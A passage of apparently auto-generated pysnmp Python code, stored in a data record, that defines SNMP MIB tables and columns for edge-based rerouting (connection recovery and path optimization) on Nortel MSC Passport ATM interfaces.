mscAtmIfUniEbrTotalPathOptimizations=\n mscAtmIfUniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvRecoverySubscribed=\n mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=\n mscAtmIfVptPnniEbrOperTable,\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,\n mscAtmIfVptUniEbrEligibleRecoveredConnections=\n mscAtmIfVptUniEbrEligibleRecoveredConnections,\n 
mscAtmIfVpcEbrInfoOptimizationSubscribed=\n mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=\n mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=\n mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=\n mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=\n mscAtmIfVptVccSrcEbrOvStorageType,\n mscAtmIfVptPnniEbrTotalPathOptimizations=\n mscAtmIfVptPnniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,\n mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,\n mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=\n mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,\n mscAtmIfVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVccEbrInfoTotalConnectionRecoveries)\n",
"step-3": "Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols('ASN1',\n 'Integer', 'ObjectIdentifier', 'OctetString')\nNamedValues, = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')\n(ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint,\n ConstraintsUnion, ConstraintsIntersection) = (mibBuilder.importSymbols(\n 'ASN1-REFINEMENT', 'ValueRangeConstraint', 'SingleValueConstraint',\n 'ValueSizeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection'))\n(mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex,\n mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex) = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmCoreMIB',\n 'mscAtmIfIndex', 'mscAtmIfVptIndex', 'mscAtmIfVcc',\n 'mscAtmIfVptVccIndex', 'mscAtmIfVpc', 'mscAtmIfVptVcc',\n 'mscAtmIfVccIndex', 'mscAtmIfVpcIndex'))\nmscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmIispMIB',\n 'mscAtmIfIisp', 'mscAtmIfVptIisp', 'mscAtmIfVptIispIndex',\n 'mscAtmIfIispIndex'))\n(mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex,\n mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc) = (mibBuilder.\n importSymbols('Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',\n 'mscAtmIfVpcSrc', 'mscAtmIfVptVccSrcIndex', 'mscAtmIfVccSrcIndex',\n 'mscAtmIfVptVccSrc', 'mscAtmIfVpcSrcIndex', 'mscAtmIfVccSrc'))\nmscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmPnniMIB',\n 'mscAtmIfVptPnniIndex', 'mscAtmIfPnniIndex', 'mscAtmIfPnni',\n 'mscAtmIfVptPnni'))\nmscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmUniMIB',\n 'mscAtmIfVptUni', 'mscAtmIfUni', 'mscAtmIfUniIndex', 'mscAtmIfVptUniIndex')\n )\nCounter32, DisplayString, Gauge32, StorageType, RowStatus = (mibBuilder.\n importSymbols(\n 
'Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB',\n 'Counter32', 'DisplayString', 'Gauge32', 'StorageType', 'RowStatus'))\nNonReplicated, = mibBuilder.importSymbols(\n 'Nortel-MsCarrier-MscPassport-TextualConventionsMIB', 'NonReplicated')\nmscPassportMIBs, = mibBuilder.importSymbols(\n 'Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB', 'mscPassportMIBs')\nNotificationGroup, ModuleCompliance = mibBuilder.importSymbols('SNMPv2-CONF',\n 'NotificationGroup', 'ModuleCompliance')\n(Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress,\n Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow,\n MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks) = (\n mibBuilder.importSymbols('SNMPv2-SMI', 'Integer32', 'ObjectIdentity',\n 'ModuleIdentity', 'Bits', 'Counter32', 'IpAddress', 'Gauge32',\n 'NotificationType', 'iso', 'MibScalar', 'MibTable', 'MibTableRow',\n 'MibTableColumn', 'MibIdentifier', 'Unsigned32', 'Counter64', 'TimeTicks'))\nTextualConvention, DisplayString = mibBuilder.importSymbols('SNMPv2-TC',\n 'TextualConvention', 'DisplayString')\natmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))\nmscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 4, 6, 2))\nmscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 4, 6, 2, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 4, 6, 2, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 
1, 4, 1, 562, 36, 2,\n 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 6, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 6, 2, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 6, 2, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec\n =ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, \n 1, 562, 36, 2, 1, 114, 4, 6, 2, 
20, 1, 2), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(\n 'readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4,\n 11))\nmscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 4, 11, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 4, 11, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 11, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 11, 30))\nif mibBuilder.loadTexts:\n 
mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 11, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 11, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 11, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), 
(0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')\nmscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 5, 8, 2))\nmscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 5, 8, 2, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 5, 8, 2, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 5, 8, 2, 1, 
1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 8, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 8, 2, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 8, 2, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVccSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec\n =ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, \n 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(\n 'readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5,\n 12))\nmscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 5, 12, 1))\nif mibBuilder.loadTexts:\n 
mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 5, 12, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 12, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 12, 30))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 12, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 
\n 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 5, 12, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 5, 12, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVccIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVccEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')\nmscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), 
Counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
# -- mscAtmIfUniEbr (…114.6.7): EBR component under the AtmIf Uni component.
# -- Row-status (1), provisioning (20, readwrite), operational (30, readonly)
# -- and statistics (40, readonly) tables.
mscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))
mscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrRowStatus.setStatus('mandatory')
mscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrComponentName.setStatus('mandatory')
mscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrStorageType.setStatus('mandatory')
mscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts:
    mscAtmIfUniEbrIndex.setStatus('mandatory')
mscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrProvTable.setStatus('mandatory')
mscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1)).setIndexNames(
    (0, 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmUniMIB', 'mscAtmIfUniIndex'),
    (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfUniEbrIndex'))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrProvEntry.setStatus('mandatory')
# Provisioning columns: 1-byte fixed-length OctetString, cloned initial value 0xc0.
mscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue='c0')).setMaxAccess('readwrite')
if mibBuilder.loadTexts:
    mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30))
if mibBuilder.loadTexts:
    mscAtmIfUniEbrOperTable.setStatus('mandatory')
